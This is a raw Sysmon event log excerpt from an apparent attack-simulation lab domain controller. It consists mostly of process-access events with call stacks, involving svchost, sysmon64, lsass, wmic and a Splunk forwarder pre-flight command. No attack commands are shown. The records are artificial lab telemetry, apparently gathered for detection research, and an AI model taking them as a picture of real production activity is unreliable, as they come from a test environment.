12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.333{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.268{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.237{266CAFBE-647E-6064-4B00-00000000AE01}37283752C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.091{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.091{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.087{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.075{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.071{266CAFBE-647E-6064-4300-00000000AE01}39243888C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 